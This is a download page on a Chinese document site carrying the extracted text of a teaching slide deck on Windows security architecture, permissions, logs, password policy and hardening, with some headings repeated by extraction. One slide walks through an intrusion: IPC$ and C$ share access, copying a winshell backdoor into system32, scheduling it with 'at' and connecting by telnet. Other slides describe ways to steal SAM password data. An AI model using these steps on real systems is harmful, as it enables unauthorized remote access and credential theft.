ImageVerifierCode 换一换
格式:PPT , 页数:97 ,大小:1.07MB ,
文档编号:5171015      下载积分:28 文币
快捷下载
登录下载
邮箱/手机:
温馨提示:
系统将以此处填写的邮箱或者手机号生成账号和密码,方便再次下载。 如填写123,账号和密码都是123。
支付方式: 支付宝    微信支付   
验证码:   换一换

优惠套餐
 

温馨提示:若手机下载失败,请复制以下地址【https://www.163wenku.com/d-5171015.html】到电脑浏览器->登陆(账号密码均为手机号或邮箱;不要扫码登陆)->重新下载(不再收费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录  
下载须知

1: 试题类文档的标题没说有答案,则无答案;主观题也可能无答案。PPT的音视频可能无法播放。 请谨慎下单,一旦售出,概不退换。
2: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
3: 本文为用户(晟晟文业)主动上传,所有收益归该用户。163文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

1,本文(windows安全原理及安全管理课件.ppt)为本站会员(晟晟文业)主动上传,163文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。
2,用户下载本文档,所消耗的文币(积分)将全额增加到上传者的账号。
3, 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(发送邮件至3464097650@qq.com或直接QQ联系客服),我们立即给予删除!

windows安全原理及安全管理课件.ppt

1、2022-12-27windows安全原理及安全管理windows安全原理及安安全原理及安全管理全管理windows安全原理及安全管理内容 Windows安全原理篇 Windows安全管理篇windows安全原理及安全管理Windows安全原理篇 Windows系统的安全架构 Windows的安全子系统 Windows的密码系统 Windows的系统服务和进程 Windows的日志系统windows安全原理及安全管理Windows系统的安全架构 Windows NT的安全包括6个主要的安全元素:Audit(审计),Administration(管理),Encryption(加密),Access

2、 Control(访问控制),User Authentication(用户认证),Corporate Security Policy(公共安全策略)。Windows NT系统内置支持用户认证、访问控制、管理、审核。windows安全原理及安全管理Windows系统的安全组件 访问控制的判断(访问控制的判断(Discretion access control)按照C2级别的定义,Windows 支持对象的访问控制的判断。这些需求包括允许对象的所有者可以控制谁被允许访问该对象以及访问的方式。对象重用(对象重用(Object reuse)当资源(内存、磁盘等)被某应用访问时,Windows 禁止所有

3、的系统应用访问该资源。强制登陆(强制登陆(Mandatory log on)与Windows for Workgroups,Windwows 95,Windows 98不同,Windows2K/NT要求所有的用户必须登陆,通过认证后才可以访问资源。审核(审核(Auditing)Windows NT 在控制用户访问资源的同时,也可以对这些访问作了相应的记录。对象的访问控制(对象的访问控制(Control of access to object)Windows NT不允许直接访问系统的某些资源。必须是该资源允许被访问,然后是用户或应用通过第一次认证后再访问。强制访问控制windows安全原理及安全

4、管理Windows安全子系统的组件安全标识符(安全标识符(Security Identifiers):SID永远都是唯一的,由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。例:S-1-5-21-1763234323-3212657521-1234321321-500访问令牌(访问令牌(Access tokens):。访问令牌是用户在通过验证的时候有登陆进程所提供的,所以改变用户的权限需要注销后重新登陆,重新获取访问令牌。第一项S表示该字符串是SID 第二项是SID的版本号,对于2000来说,这个就是1 然后是标志符的颁发机构(identifier aut

5、hority),对于2000内的帐户,颁发机构就是NT,值是5 然后表示一系列的子颁发机构,前面几项是标志域的 最后一个标志着域内的帐户和组 windows安全原理及安全管理Windows安全子系统的组件安全描述符(安全描述符(Security descriptors):):Windows NT中的任何对象的属性都有安全描述符这部分。它保存对象的安全配置。访问控制列表(访问控制列表(Access control lists):):在NT系统中,每当请求一个对象或资源访问时,就会检查它的ACL,确认给用户授予了什么样的权利。每创建一个对象,对应的ACL也会创建。ACL包含一个头部,其中包含有更新

6、版本号、ACL的大小以及它所包含的ACE数量等信息。访问控制项(访问控制项(Access control entries):):访问控制项(ACE)包含了用户或组的SID以及对象的权限。访问控制项有两种:允许访问和拒绝访问。拒绝访问的级别高于允许访问。当你使用管理工具列出对象的访问权限时,列表的排序是以文字为顺序的,它并不象防火墙的规则那样由上往下的,不过好在并不会出现冲突,拒绝访问总是优先于允许访问的。windows安全原理及安全管理Windows安全子系统 Winlogon Graphical Identification and Authentication DLL(GINA)Local

7、 Security Authority(LSA)Security Support Provider Interface(SSPI)Authentication Packages Security support providers Netlogon Service Security Account Manager(SAM)windows安全原理及安全管理Windows子系统实现图Winlogon,Local Security Authorit以及Netlogon服务在任务管理器中都可以看到,其他的以DLL方式被这些文件调用。windows安全原理及安全管理Windows安全子系统Winlogo

8、n and Gina:Winlogon调用GINA DLL,并监视安全认证序列。而GINA DLL提供一个交互式的界面为用户登陆提供认证请求。GINA DLL被设计成一个独立的模块,当然我们也可以用一个更加强有力的认证方式(指纹、视网膜)替换内置的GINA DLL。Winlogon在注册表中查找HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon,如果存在GinaDLL键,Winlogon将使用这个DLL,如果不存在该键,Winlogon将使用默认值MSGINA.DLLwindows安全原理及安全管理Windows安全子系统 本地安全认证(

9、本地安全认证(Local Security Authority):):调用所有的认证包,检查在注册表 重新找回本地组的SIDs和用户的权限。创建用户的访问令牌。管理本地安装的服务所使用的服务账号。储存和映射用户权限。管理审核的策略和设置。管理信任关系。windows安全原理及安全管理Windows安全子系统 安全支持提供者的接口(安全支持提供者的接口(Security Support Provide Interface):):微软的Security Support Provide Interface很简单地遵循RFC 2743和RFC 2744的定义,提供一些安全服务的API,为应用程序和服务

10、提供请求安全的认证连接的方法。认证包(认证包(Authentication Package):):认证包可以为真实用户提供认证。通过GINA DLL的可信认证后,认证包返回用户的SIDs给LSA,然后将其放在用户的访问令牌中。windows安全原理及安全管理Windows安全子系统 安全支持提供者(安全支持提供者(Security Support Provider):):安全支持提供者是以驱动的形式安装的,能够实现一些附加的安全机制,默认情况下,Windows NT安装了以下三种:Msnsspc.dll:微软网络挑战/反应认证模块 Msapsspc.dll:分布式密码认证挑战/反应模块,该模块

11、也可以在微软网络中使用 Schannel.dll:该认证模块使用某些证书颁发机构提供的证书来进行验证,常见的证书机构比如Verisign。这种认证方式经常在使用SSL(Secure Sockets Layer)和PCT(Private Communication Technology)协议通信的时候用到。windows安全原理及安全管理Windows安全子系统 网络登陆(网络登陆(Netlogon):):。安全账号管理者(安全账号管理者(Security Account Manager):):安全账号管理者,也就是我们经常所说的SAM,它是用来保存用户账号和口令的数据库。windows安全原理

12、及安全管理Windows 2000 本地登陆过程 GINALSASSPIKerberosNTLMwindows安全原理及安全管理Windows的密码系统 windows NT及及win2000中对用户帐户的安全管中对用户帐户的安全管理使用了安全帐号管理器理使用了安全帐号管理器(security account manager)的机制的机制,安全帐号管理器对帐号的管理安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也时就同时创建,一旦帐号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同同时被

13、删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时的用户名,在每次创建时获得的安全标识都时完全不同的。完全不同的。windows安全原理及安全管理Windows的密码系统 安全账号管理器的具体表现就是安全账号管理器的具体表现就是%SystemRoot%system32configsam文件。文件。在正常设置下仅对在正常设置下仅对system是可读写的。是可读写的。windows安全原理及安全管理用户权利、权限和共享权限 网络安全性依赖于给用户或组授予的能力:权力:在系统上完成特定动作的授权,一般由系统指定给内置组,但也可以由管理员将其扩大到组和用户上。权限:可以授予用户

14、或组的文件系统能力。共享:用户可以通过网络使用的文件夹。windows安全原理及安全管理Windows系统的用户权利 权利适用于对整个系统范围内的对象和任务的操作,通常是用来授权用户执行某些系统任务。当用户登录到一个具有某种权利的帐号时,该用户就可以执行与该权利相关的任务。下面列出了用户的特定权利:Access this computer from network 可使用户通过网络访问该计算机。Add workstation to a domain 允许用户将工作站添加到域中。Backup files and directories 授权用户对计算机的文件和目录进行备份。Change the

15、system time 用户可以设置计算机的系统时钟。Load and unload device drive 允许用户在网络上安装和删除设备的驱动程序。Restore files and directories 允许用户恢复以前备份的文件和目录。Shutdown the system 允许用户关闭系统。windows安全原理及安全管理Windows系统的用户权限 RWXDPOwindows安全原理及安全管理Windows系统的用户权限 权限适用于对特定对象如目录和文件(只适用于权限适用于对特定对象如目录和文件(只适用于NTFS卷)的操作,卷)的操作,指定允许哪些用户可以使用指定允许哪些用户可

16、以使用这些对象,以及如何使用(如把某个目录的访问这些对象,以及如何使用(如把某个目录的访问权限授予指定的用户)。权限分为目录权限和文权限授予指定的用户)。权限分为目录权限和文件权限,每一个权级别都确定了一个执行特定的件权限,每一个权级别都确定了一个执行特定的任务组合的能力,这些任务是:任务组合的能力,这些任务是:Read(R)、Execute(X)、Write(W)、Delete(D)、Set Permission(P)和和 Take Ownership(O)。下表显示。下表显示了这些任务是如何与各种权限级了这些任务是如何与各种权限级 别相关联的。别相关联的。windows安全原理及安全管理W

17、indows系统的用户权限权限级别权限级别RXWDPO允许的用户动作允许的用户动作No Access用户不能访问该目录ListRX可以查看目录中的子目录和文件名,也可以进入其子目录ReadRX具有List权限,用户可以读取目录中的文件和 运行目录中的应用程序AddXW用户可以添加文件和子录Add and ReadRXW具有Read和Add的权限ChangeRXWD有Add和Read的权限,另外还可以更改文件的内容,删除文件和子目录 如果对目录有Execute(X)权限,表示可以穿越目录,进入其子目。windows安全原理及安全管理Windows系统的用户权限权限级别权限级别RXWDPO允许的用

18、户动作允许的用户动作No Access用户不能访问该文件ReadRX用户可以读取该文件,如果是应用程序可以运行ChangeRXWD有Read的权限,还可用修和删除文件Full controlRXWDPO包含Change的权限,还可以更改权限和获取文件的有权windows安全原理及安全管理Windows系统的共享权限 共享只适用于文件夹(目录),如果文件夹不是共享只适用于文件夹(目录),如果文件夹不是共享的,那么在网共享的,那么在网 络上就不会有用户看到它,也络上就不会有用户看到它,也就更不能访问。网络上的绝大多数服务器就更不能访问。网络上的绝大多数服务器 主要用主要用于存放可被网络用户访问的文

19、件和目录,要使网于存放可被网络用户访问的文件和目录,要使网络用户可以访问络用户可以访问 在在NT Server服务器上的文件和服务器上的文件和目录,必须首先对它建立共享。共享权目录,必须首先对它建立共享。共享权 限建立了限建立了通过网络对共享目录访问的最高级别。通过网络对共享目录访问的最高级别。windows安全原理及安全管理Windows系统的共享权限共享权限级别共享权限级别允许的用户动作允许的用户动作No Access(不能访问)禁止对目录和其中的文件及子目录进行访问但允许查看文件名和子目录名,改变共享Read(读)目录的子目录,还允许查看文件的数据 和运行应用程序Change(更改)具有

20、“读”权限中允许的操作,另外允许往目录中添加文件和子目录,更改文数据,删除文件和子目录Full control(完全控制)具有“更改”权限中允许的操作,另外还允许更改权限(只适用于NTFS卷)和获所有权(只适用于NTFS卷)共享点一定要小心地分配。因为权限仅仅是分配给共享点的,任何共享点下的文件:或目录都足以和共享点本身相同的权限被访问的。windows安全原理及安全管理Windows的系统服务 单击“开始”,指向“设置”,然后单击“控制面板”。双击“管理工具”,然后双击“服务”。在列表框中显示的是系统可以使用的服务。Windows 2k下可以在命令行中输入services.msc打开服务列表

21、。windows安全原理及安全管理Windows的系统服务服务包括三种启动类型:自动,手动,已禁用。自动-Windows 2000启动的时候自动加载服务 手动-Windows 2000启动的时候不自动加载服务,在需要的时候手动开启 已禁用-Windows 2000启动的时候不自动加载服务,在需要的时候选择手动或者自动方式开启服务,并重新启动电脑完成服务的配置双击需要进行配置的服务,出现下图所示的属性对话框:windows安全原理及安全管理Windows的系统服务 KEY_LOCAL_MACHINESYSTEMCurrentControlSetService 底下每一笔 服务项目子项都有一个 S

22、tart 数值,这个数值的内容依照每一个服务项目的状 况而又有不同。Start 数值内容所记录的就是服务项目驱动程式该在何时被加载。目 前微软对 Start 内容的定义有 0、1、2、3、4 等五种状态,0、1、2 分别代表 Boot、System、Auto Load 等叁种意义。而 Start 数值内容为 3 的服务项目代表让使用 者以手动的方式载入(Load on demand),4 则是代表停用的状态,也就是禁用。windows安全原理及安全管理Windows的系统进程基本的系统进程 smss.exe Session Manager 会话管理 csrss.exe 子系统服务器进程 win

23、logon.exe 管理用户登录 services.exe 包含很多系统服务 lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley(IKE)和 IP 安全驱动程序。(系统服务)svchost.exe 包含很多系统服务 spoolsv.exe 将文件加载到内存中以便迟后打印。(系统服务)explorer.exe 资源管理器 internat.exe 输入法 windows安全原理及安全管理Windows的 Log系统Windows有三种类型的事件日志:系统日志 跟踪各种各样的系统事件,比如跟踪系统启动过程中的事件或者硬件和控制器的故障。应用程序日志 跟踪应用程序关联的事件

24、,比如应用程序产生的象装载DLL(动态链接库)失败的信息将出现在日志中。安全日志 跟踪事件如登录上网、下网、改变访问权限以及系统启动和关闭。注意:安全日志的默认状态是关闭的。windows安全原理及安全管理Windows的 Log系统 日志在系统的位置是:%SYSTEMROOT%system32configSysEvent.Evt%SYSTEMROOT%system32configSecEvent.Evt%SYSTEMROOT%system32configAppEvent.Evt LOG文件在注册表的位置是:HKEY_LOCAL_MACHINESystemCurrent Control Set

25、ServicesEventlog windows安全原理及安全管理Windows的应用系统日志Internet信息服务信息服务FTP日志默认位置:日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个日志,默认每天一个日志 Internet信息服务信息服务WWW日志默认位置:日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志,默认每天一个日志 FTP日志和日志和WWW日志文件名通常为日志文件名通常为ex(年份)(月份)(日期),例(年份)(月份)(日期),例如如ex001023,就是,就是2000

26、年年10月月23日产生的日志,用记事本就可直接打开日产生的日志,用记事本就可直接打开Scheduler服务日志默认位置:服务日志默认位置:%systemroot%schedlgu.txt windows安全原理及安全管理FTP日志分析FTP日志分析,如下例:#Software:Microsoft Internet Information Services 5.0(微软IIS5.0)#Version:1.0(版本1.0)#Date:20001023 03:11:55(服务启动时间日期)03:11:55 127.0.0.1 1USER administator 331(IP地址为127.0.0.1

27、用户名为administator试图登录)03:11:58 127.0.0.1 1PASS 530(登录失败)03:12:04 127.0.0.1 1USER nt 331(IP地址为127.0.0.1用户名为nt的用户试图登录)03:12:06 127.0.0.1 1PASS 530(登录失败)03:12:32 127.0.0.1 1USER administrator 331(IP地址为127.0.0.1用户名为administrator试图登录)03:12:34 127.0.0.1 1PASS 230(登录成功)03:12:41 127.0.0.1 1MKD nt 550(新建目录失败)

28、03:12:45 127.0.0.1 1QUIT 550(退出FTP程序)从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了3次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间IP地址以及探测的用户名。windows安全原理及安全管理HTTP的日志分析HTTP日志分析,如下例:#Software:Microsoft Internet Information Services 5.0#Version:1.0#Date:20001023 03:09:31#Fields:date time cip csusername sip sport csmethod csuris

29、tem csuriquery scstatus cs(UserAgent)20001023 03:09:31 192.168.1.26 192.168.1.37 80 GET/iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)20001023 03:09:34 192.168.1.26 192.168.1.37 80 GET/pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)通过分析第六行,可以看出2000年10

30、月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间 windows安全原理及安全管理Windows安全管理篇windows安全原理及安全管理Windows安全管理篇 Windows系统安装 系统安全检查 系统安全配置 IIS安全配置 SQL Server口令和补丁windows安全原理及安全管理Windows系统安

31、装 使用正版可靠安装盘 将系统安装在NTFS分区上 系统和数据要分开存放在不同的磁盘 最小化安装服务 安全补丁合集和相关的Hotfix 装其它的服务和应用程序补丁 每次在安装其它程序之后,重新应用安全补丁防止病毒进行文件系统安全设置最少建立两个分区,一个系统分区,一个应用程序分区,因为微软的IIS经常会有泄漏源码/溢出的漏洞,如果把系统和IIS放在同一个驱动器会导致系统文件的泄漏甚至入侵者远程获取ADMIN。NT安装SP6a和相关的HotfixWIN2K安装SP4和相关的HotfixWINXP安装SP2和相关的HotfixWIN2003安装相关的Hotfixwindows安全原理及安全管理系统

32、安全检查 系统信息 补丁安装情况 帐号和口令 网络与服务 文件系统 日志审核 安全性增强windows安全原理及安全管理系统信息 检查服务器是否安装多系统,多系统无法保障文件系统的安全 从“operating systems”字段可以查到允许启动的系统列表 windows安全原理及安全管理系统信息 查看主机路由信息 windows安全原理及安全管理补丁安装情况 检查当前主机所安装的Service Pack以及Hotfix (Mbsa)SP版本IE版本,请确认在Hotfix中是否存在IE SP1补丁信息Hotfix信息2022-12-27windows安全原理及安全管理帐号和口令 多数的系统,口

33、令是进入系统的第一道防线,也是唯一防线;决大多数的口令算法是可靠的;获得口令的方式有多种;口令问题多数出在管理与安全意识的问题上。2022-12-27windows安全原理及安全管理口令问题1:弱口令 用户趋向于选择容易的口令,即空口令;用户会选择易于记住的东西做口令 Test、Password、guest、username等 名字、生日、简单数字等 易于选择该系统的应用 Ntserver、orancle等 多数用户的安全意识薄弱2022-12-27windows安全原理及安全管理口令问题2:明文传输 使用明文密码传送的应用:FTP、POP、Telnet、HTTP、SNMP、Socks Mou

34、ntd、Rlogin、NNTP、NFS、ICQ、IRC、PcAnywhere、VNC等 MS SQL、Oracle等 上诉服务都容易成为攻击对象2022-12-27windows安全原理及安全管理口令攻击的方式 手工猜测;方法:社会工程学、尝试默认口令 自动猜测;工具:NAT、LC等 窃听:登陆、网络截获、键盘监听 工具:Dsniff、Sniffer Pro、IKS等2022-12-27windows安全原理及安全管理Windows常见的口令问题 NT/2000的口令问题;用户教育的问题;管理员注意事项。2022-12-27windows安全原理及安全管理NT/2000的口令问题 SAM(Se

35、curity Accounts Manager)LanManager散列算法(LM)已被破解,但仍被保留 NT散列算法(NTLM/NTLMv2)强加密、改良的身份认证和安全的会话机制 自动降级2022-12-27windows安全原理及安全管理NT/2000的口令问题 LanManager散列算法的问题 口令都被凑成14个字符;不足14位的,用0补齐;全部转化为大写字母;分成两部分分别加密。举例:Ba01cK28tr BA01CK2和8TR0000 2022-12-27windows安全原理及安全管理NT/2000的口令问题 SAM数据存放位置%systemroot%system32confi

36、gsam%systemroot%repairsam._(NT)Rdisk%systemroot%repairsam(2000)ntbackup 注册表HKEY_LOCAL_MACHINESAMSAM 和HKEY_LOCAL_MACHINESECURITYSAM仅对system是可读写的 2022-12-27windows安全原理及安全管理NT/2000的口令问题 获取SAM数据的方法 使系统自举到另外的系统,copy SAM文件;从repair目录攫取备份的SAM;窃听口令交换2022-12-27windows安全原理及安全管理口令策略使用密码强度及账户老化、锁定策略;设置最小的密码程度为8个

37、字符,最短密码时间为1-7天,最长密码时间为42天,最小的密码历史轮回为6,失败登陆尝试为3,账户锁定为60分钟等。2022-12-27windows安全原理及安全管理用户教育 口令禁忌:不要选择可以在任何字典或语言中找到的口令 不要选择简单字母组成的口令 不要选择任何指明个人信息的口令 不要选择包含用户名或相似类容的口令 不要选择短于6个字符或仅包含字母或数字的口令 不要选择作为口令范例公布的口令2022-12-27windows安全原理及安全管理管理员注意事项确保每个用户都有一个有效的口令;对用户进行口令教育;使用防止用户选择弱口令的配置与工具;进行口令检查,确保没有弱口令;确保系统与网络

38、设备没有缺省账号和口令;不要在多个机器上使用相同的口令;从不记录也不与他人共享密码;2022-12-27windows安全原理及安全管理管理员注意事项 从不将网络登录密码用作其他用途;域Administrators账户和 本地Administrators帐户使用不同的密码;小心地保护在计算机上保存密码的地方;对于特权用户强制30天更换一次口令,一般用户60天更换;使用VPN、SSH、一次性口令等安全机制.windows安全原理及安全管理Null Session Null Session(空连接)连接也称为匿名登陆,这种机制允许匿名用户通过网络获得系统的信息或建立未授权的连接。它常被诸如expl

39、orer.exe 的应用来列举远程服务器上的共享。非授权主机可以是网络里所有的主机,即这个主机不需要有访问服务器的任何权限。任何一台主机都可以和服务器之间建立一个NULL session,这个NULL session在服务器里属于everyone组。缺省情况下所有的用户都属于everyone这个组。everyone组没有很大的权力。但是可以利用它获取系统的用户信息。windows安全原理及安全管理Null Session net use serverIPC$/user:此命令用来建立一个空会话 获得目标上的所有用户列表。包括服务器上有哪些组和用户。服务器的安全规则,包括帐户封锁、最小口令长度、

40、口令使用周期、口令唯一性设置等。列出共享目录。读注册表。windows安全原理及安全管理Null Session net view server 此命令用来查看远程服务器的共享资源 net time server 此命令用来得到一个远程服务器的当前时间。At server此命令用来得到一个远程服务器的调度作业windows安全原理及安全管理防御办法 屏蔽屏蔽135-139,445端口(网络属性)端口(网络属性)去除去除NetBios Over TCP/IP(在服务中去除在服务中去除server)修改注册表修改注册表 HKEY-LOCAL_MACHINESYSTEMCurrentControSe

41、tControlLSA Value Name:RestrictAnonymous Data Type:REG_DWORD Value:1(2 Win2000)参考KB articles Q143474,Q143475,Q161372,Q155363,Q246261windows安全原理及安全管理入侵实例入侵实例 通过通过NetBIOS入侵入侵139139端口是端口是NetBIOSNetBIOSSessionSession端口,用来进行文件和打印端口,用来进行文件和打印共享,是共享,是NTNT潜在的危险。潜在的危险。1、用NBTSTAT命令,用来查询NetBIOS信息。Cnbtstat A x.

42、x.x.x2、用net use建立连接c:net use x.x.x.xipc$“密码”/user:”用户名”c:net view x.x.x.x c:net use x:x.x.x.xc$c:dir x:/p注意:通过IPC$连接会在Eventlog中留下记录。windows安全原理及安全管理 copy winshell.exe 192.168.0.7admin$system32 at 192.168.0.7 11:55 winshell.exe 54088 telnet 192.168.0.7 54088windows安全原理及安全管理帐号和口令 是否有密码过期策略 密码过期策略包括密码最

43、长存留期和最短存留期,最长存留期是指密码在多久后过期,最短存留期是指在多久后才可以修改密码 开始|程序|管理工具|本地安全设置|安全设置|帐户策略|密码策略:#密码最长存留期,以天为单位,MAXDAYS天后密码过期,缺省为42天(建议不超过42天)#密码最短存留期,以天为单位,MINDAYS天后才可以修改密码,缺省为0(建议17天)windows安全原理及安全管理帐号和口令 检查Guest帐号 Guest帐号是一个容易忽视的帐号,黑客可能修改该帐号权限,并利用该帐号登陆系统 没有激活windows安全原理及安全管理帐号和口令 系统是否使用默认管理员帐号 默认管理员帐号可能被攻击者用来进行密码暴

44、力猜测,建议修改默认管理员用户名。Administrator用户名已被修改windows安全原理及安全管理帐号和口令 是否存在可疑帐号 查看系统是否存在攻击者留下的可疑帐号,或检查主机操作人员遗留下的尚未删除的帐号。可禁用不需要帐号:windows安全原理及安全管理帐号和口令 检查系统中是否存在脆弱口令 系统存在脆弱口令帐号可能导致攻击者轻易猜出帐号密码。强壮口令要求:8位或以上口令长度、大小写字母、数字、特殊符号windows安全原理及安全管理网络与服务 查看网络开放端口 查看监听端口windows安全原理及安全管理网络与服务 得到网络流量信息 windows安全原理及安全管理网络与服务 检

45、查主机端口、进程对应信息 Fport -http:/ windows安全原理及安全管理网络与服务 查看系统已经启动的服务列表 windows安全原理及安全管理网络与服务 查看主机是否开放了共享或管理共享未关闭。windows安全原理及安全管理文件系统 查看主机磁盘分区类型 服务器应使用具有安全特性的NTFS格式,而不应该使用FAT或FAT32分区。开始|管理工具|计算机管理|磁盘管理 windows安全原理及安全管理文件系统 检查特定文件的文件权限 对于一些敏感文件权限需要进行修改,避免文件被恶意用户执行。仅适用于NTFS分区 windows安全原理及安全管理文件系统 检查特定目录的权限 在检

46、查中一般检查各个磁盘根目录权限、Temp目录权限 windows安全原理及安全管理日志审核 检查主机的审核情况 开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|审核策略 windows安全原理及安全管理日志审核 检查系统日志大小、覆盖天数 开始|运行|eventvwr|右键“系统”可设置更大的空间存储日志如果空间足够,建议手动清除日志windows安全原理及安全管理安全性增强保护注册表,防止匿名访问 默认权限并不限制对注册表的远程访问。只有管理员才应具有对注册表的远程访问权限,因为默认情况下 Windows 2000 注册表编辑工具支持远程访问。对匿名连接的额外限制

47、 默认情况下,Windows系统允许匿名用户枚举主机帐号列表,获得一些敏感信息。开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项 建议设置为“不允许枚举 SAM 帐号和共享”windows安全原理及安全管理安全性增强 检查是否登陆时间用完后自动注销用户 开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项 是否显示上次成功登陆的用户名 开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项 windows安全原理及安全管理安全性增强 是否允许未登陆系统执行关机命令 开始|运行|gpedit.msc

48、|计算机配置|Windows设置|本地策略|安全选项 仅登陆用户允许使用光盘 开始|运行|gpedit.msc|计算机配置|Windows设置|本地策略|安全选项 windows安全原理及安全管理系统安全配置 补丁安装 帐号、口令策略修改 网络与服务安全性增强 文件系统安全性增强 日志审核增强 安全性增强windows安全原理及安全管理补丁安装 使用Windows update安装最新补丁 手工安装补丁:http:/ 推荐修改为:设置帐号策略后可能导致不符合帐号策略的帐号无法登陆,需修改帐号密码(注:管理员不受帐号策略限制,但管理员密码应复杂)密码长度最小值7 字符密码最长存留期90天密码最短

49、存留期30天帐号锁定计数器5次帐户锁定时间5分钟帐户锁定阀值1分钟windows安全原理及安全管理网络与服务安全性增强 卸载不需要的服务 开始|设置|控制面板|添加/删除程序|Windows组件,卸载不需要的服务 避免未知漏洞给主机带来的风险 windows安全原理及安全管理网络与服务安全性增强 将暂时不需要开放的服务停止 开始|运行|services.msc|将上述服务的启动类型设置为手动并停止上述服务 避免未知漏洞给主机带来的风险 windows安全原理及安全管理文件系统安全性增强 限制特定执行文件的权限 未对敏感执行文件设置合适的权限 建议禁止Guest组用户访问资源:xcopy.exe

50、 wscript.exe cscript.exe net.exe arp.exe edlin.exe ping.exe route.exe posix.exe Rsh.exe atsvc.exe Copy.execacls.exe ipconfig.exe rcp.exe cmd.exedebug.exe regedt32.exe regedit.exe telnet.exeFinger.exeNslookup.exeRexec.exeftp.exeat.exerunonce.exe nbtstat.exe Tracert.exenetstat.exe windows安全原理及安全管理日志审核

侵权处理QQ:3464097650--上传资料QQ:3464097650

【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。


163文库-Www.163Wenku.Com |网站地图|